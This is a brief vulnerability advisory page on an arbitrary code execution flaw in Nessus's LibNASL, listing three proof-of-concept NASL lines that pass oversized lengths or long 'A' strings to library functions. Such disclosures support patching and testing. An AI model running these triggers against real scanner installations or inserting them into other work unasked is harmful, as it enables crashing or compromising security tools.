• info
• discussion
• exploit
• solution
• references

Nessus LibNASL Arbitrary Code Execution Vulnerability

The following proof-of-concept NASL scripts were provided:

insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );